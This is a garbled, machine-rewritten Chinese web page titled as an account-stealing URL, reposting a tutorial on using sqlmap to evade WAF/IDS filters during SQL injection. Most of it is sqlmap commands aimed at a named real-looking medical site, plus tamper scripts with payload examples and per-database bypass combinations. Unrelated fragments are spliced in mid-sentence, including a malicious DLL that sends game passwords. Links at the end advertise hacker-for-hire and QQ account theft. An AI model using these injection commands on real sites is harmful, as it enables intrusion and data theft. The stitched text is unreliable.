有用盗号网址:运用sqlmap 绕过防火墙进行注入测验

访客4年前黑客工具524

现在的 *** 环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,乃至封闭我们的主机IP,所以这个时分,我们就要考虑怎样进行绕过,到达注入的方针。由于现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文依据sqlmap 进行绕过注入测验,介绍至今依然有用有用的技巧,以下战略在特定的环境能够成功绕过,详细是否绕过,请细心检查输出的信息。

0x01 承认WAF

     首要我们判别该We一同,新建了一个 administrator 假超级用户帐号,并设置了一个100位长的暗码,此用户不属于任何组,不具有任何权限,用于威逼侵犯者,俗称“骗局帐号”。

b 服务器是否被WAF/IPS/IDS保护着。这点很简单完成,由于我们在漏扫或许运用专门东西来检测是否有WAF,这个检测,在nmap 的NSE,或许WVS的战略或许APPSCAN的战略中都有,我们能够运用这些来判别。在此我们,也介绍运用sqlmap 进行检测是否有WAF/IPS/IDS

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首选

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10  --check-waf#备选

0x02 运用参数进行绕过

root@kali:~# sqlmap -u &q }uot;http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 #运用恣意浏览器进行绕过,尤其是在WAF装备不妥的时分

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#运用HTTP 参数污染进行绕过,尤其是在ASP.NET/IIS 平台上

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 #运用长的延时来防止触发WAF的机制,这办法比较耗时

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#运用署理进行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy#制止运用系统的署理,直接衔接进行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session#清空会话,重构注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex#或许运用参数 --no-cast ,进行字符码转化

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --mobile #对移动端的服务器进行注入

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tor # 匿名注入

0x03 运用脚本介绍1 运用格局:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py#脚本A,脚本B 

2 脚本总类

01 apostrophemask.py#用utf8替代引号;Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

02 equaltolike.py#MSSQL * SQLite中like 替代等号;Example:  Input: SELECT * FROM users WHERE id=1 ;Output: SELECT * FROM users WHERE id LIKE 1

03 greatest.py#MySQL中绕过过滤’>’ ,用GREATEST替换大于号;Example: ('1 AND A > B') '1 AND GREATEST(A,B+1)=A'

04 space2hash.py#空格替换为#号 随机字符串 以及换行符;Input: 1 AND 9227=9227;Output: 1%2 *** TTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

05 apostrophenullencode.py#MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL绕过过滤双引号,替换字符和双引号;

06 halfversionedmorekeywords.py#当数据库为mysql时绕过防火墙,每个要害字之前增加mysql版别谈论;

07 space2morehash.py#MySQL中空格替换为 #号 以及更多随机字符串 换行符;

08 appendnullbyte.py#Microsoft Access在有用负荷完毕方位加载零字节字符编码;Example: ('1 AND 1=1') '1 AND 1=1%00'

09 ifnull2ifisnull.py#MySQL,SQLite (possibly),SAP MaxDB绕过对 IFNULL 过滤。 替换相似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

10 space2mssqlblank.py(mssql)#mssql空格替换为其它空符号

11base64encode.py#用base64编码j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

12 space2mssqlhash.py#mssql查询中替换空格

13 modsecurityversioned.py#(mysql中过滤空格,包括完好的查询版别注释;Example: ('1 AND 2>1--') '1 /*!30874AND 2>1*/--'

14 space2mysqlblank.py#(mysql中空格替换其它空白符号

15 between.py#MS SQL 2005,MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0顶用between替换大于号(>)

16 space2mysqldash.py#MySQL,MSSQL替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

17 multiplespaces.py#环绕SQL要害字增加多个空格;Example: ('1 UNION SELECT foobar') '1 UNION SELECT foobar'

18 space2plus.py#用+替换空格;Example: ('SELECT id FROM users') 'SELECT+id+FROM+users'

19 bluecoat.py#MySQL 5.1, SGOS替代空格字符后与一个有用的随机空白字符的SQL句子。 然后替换=为like

20 nonrecursivereplacement.py#两层查询句子。替代predefined SQL要害字with表明 suitable for替代(例如 .replace(“SELECT”、””)) filters

21 space2randomblank.py#替代空格字符(“”)从一个随机的空白字符可选字符的有用集

22 sp_password.py#追加sp_password’从DBMS日志的主动含糊处理的26 有用载荷的结尾

23 chardoubleencode.py#双url编码(不处理以编码的)

24 unionalltounion.py#替换UNION ALL SELECT UNION SELECT;Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

25 charencode.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0url编码;

26 randomcase.py#Microsoft SQL Server 2005,MySQL 4, 5.0 and 5.5,Oracle 10g,PostgreSQL 8.3, 8.4, 9.0中随机大小写

27 unmagicquotes.py#宽字符绕过 GPC addslashes;Example: * Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20

28 randomcomments.py#用/**/切割sql要害字;Example:‘INSERT’ becomes ‘IN//S//ERT’

29 charunicodeencode.py#ASP,ASP.NET中字符串 unicode 编码;

30 securesphere.py#追加特制的字符串;Example: ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"

31 versionedmorekeywords.py#MySQL >= 5.1.13注释绕过

32 space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’

33 halfversionedmorekeywords.py#MySQL < 5.1中要害字前加注释

 

0x04脚本参数组合战略绕过1 mysql绕过:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversioned.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent --hpp  --tamper=space2mysqldash.p,versionedmorekeywords.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  -delay=3.5  ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=apostrophemask.py,equaltolike.py

补白:这些组合战略能够依据注入的反应信息,及时调整组合战略

2 MSSQL:

root@kali:~# sqlmap -u "http://yiliao.kingd }ee.com/contents.php?id=51&types=4"  -delay=3.5  ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=randomcase.py,charencode.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --hpp --tamper=space2comment.py,randomcase.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --time-sec=120  --tamper=space2mssqlblank.py,securesphere.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --tamper=unionalltoun需求内嵌代码ion.py,base64encode.p

3 ms access:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --random-agent  --tamper=appendnullbyte.py,space2plus.py

root@kali:~# sqlmap -u "http://yiliao.kin

◆搜索功用:能对指定组或许整个数据库进行搜索。

gdee.com/contents.php?id=51&types=4"  --delay=3.5 --random-agent --hpp  --tamper=chardoubleencode.py4 Oracle:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=5 --random-agent --hpp --tamper=unmagicquotes.py,unionalltounion.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=5--user-agent =“Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0&r目录dquo; --hpp --tamper=charunicodeencode.py,chardoubleencode.py

5 主张:

      由于WAF或许选用白名单规矩,所以关于挑选哪种战略,重点是依据-v 3 提示的信息进行判别,能够抓取干流的浏览器的user-agent ,s恰当的延时,加上注入字符转化---大小写、空格、字符串、注释、加密等等办法

      鉴于参数和32种脚本,在我们平常的注入,这些通过不同的多重组合来进行测验,这个测验或许比较耗时

有用盗号网址:运用sqlmap 绕过防火墙进行注入测验

Pend: 417/0__a *** __("lea eax,[ebp+0x2e]");功用模块使用sqlmap 绕过防火墙进行注入测试

有效盗号网址分析之前,我们需求理清思路,逐步分析,慢慢行成一套归于自己的分析流程。通过SystemTimeToFileTime()将SystemTime转化为FileTime。这是将这个样本APP激活成设备管理器,在meta-data中知道device_admin_sample.xml文件存放了,激活设备管理器央求打开的战略,并且一旦战略被触发就会调用这个广播接收器中重写的办法,如图7.png,都会打印一条日志:

Xmanager Enterprise Build 1236nt!PspAllocateProcess+0xb4blong ptrace(int request, pid_t pid, void *addr, void *data);有效盗号网址

请注意,我写这篇文章只是出于教育目的哦——悉数因此带来的成果和本文作者、译者无关。

一、 前语0xbfff0000 XX XX XX XX 使用sqlmap 绕过防火墙进行注入测试

有效盗号网址运用私有目录被束缚访问(0700),文件所有者将无法通过设置私有文件访问办法为MODE_WORLD_READABLE与MODE_WORLD_WRITEABLE来打开私有文件的读写权限;此外,通过file:///URI也将无法访问到运用包之外的途径;一同DownloadManager将不能通过文件名来同享私有文件的信息。若要在运用间同享文件,开发者能够发送一项content://URI,并授权URI的暂时访问权限。进行此授权的最简略办法是运用FileProvider类。这一改动有用保证了同享文件的安全问题。7.1 中间人侵犯输出: 简介

[Bash shell] 纯文本检查 拷贝代码脚本大致内容:基本信息核算(IP地址、MAC地址、端口信息、服务信息等)、主机安全检查(包括等保三级要求主机相关的检查点)、系统功用核算(暂时未参与分析)、恶意代码、程序检查等检查点。 有效盗号网址

drwxr-xr-x 2 root root 4096 Sep 14 03:13 20140914

使用sqlmap 绕过防火墙进行注入测试

2.信息收集

通过查找游戏的主页面的类”88369game”来判别我们输入的用户名是否有用。假设找到游戏的主界面恶意dll才会发送用户的游戏账号和暗码,假设没有查找到游戏的界面就不会发送

假设没有换行的话,n其实是能够省掉的,但是引号必不行少。下面这样就不行: if (pThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG32)
本文标题:有用盗号网址:运用sqlmap 绕过防火墙进行注入测验

相关文章

js 浮点小数计算精度问题 parseFloat 精度问题

在js中举行以米为单米举行金额盘算时 使用parseFloat会发生精度问题 var price = 10.99; var quantity = 7; var needPay = parseFloat...

趣加速,咪多多,家里有矿,免费赚1.8元!

趣加速新用户登录免费送5000金币,可直接提现0.3米,秒到微信零钱!咪多多,首次绑定微信,直接到账0.3米,还送一只福利猫,越日即可再提现1米!家里有矿,是骗子挂机变种而来,可免费赚0.2-1米,看...

滑冰的技巧(滑冰运动有哪些常用技巧?)

  滑冰是一项集速度,协调,耐力,力量,柔韧,平衡,灵活,优美于一身的运动。那么,滑冰运动有哪些常用技巧?又有哪些注意事项呢佰佰安全网今天就来讲讲相关的冰雪运动安全小知识。   滑冰,亦称“冰嬉”,很...

moving(moving是什么意思)

keepmoving的中文翻译是:继续前进一、moving的词性1、adj.移动的;动人的;活动的2、v.移动(move的ing形式)二、短语1、wekeeponmoving。 somoving的意思...

24小时接单的顶级黑客,专业高手黑客服务(黑客接单平台)

 在域名圈,有一句话叫“坚持价值投资”,何为价值投资,域名的价值在哪里?其中一个域名,最重要的未来是否能被建站,只有建站才是一个域名最好的归宿。说到建站,难免要提到终端买米这种情况。   终端买域名...

防止黑客盗qq号,黑客网络 活动端口,黑客锁密码怎么破解教程

?>2.它支撑多个指令,其间一些指令是经过创立暂时.VBS文件并调用cscript.exe运转来履行的。 所支撑的指令能让此RAT完成根本的键盘记录功用,比方盗取Chrome中保存的暗码,查杀使...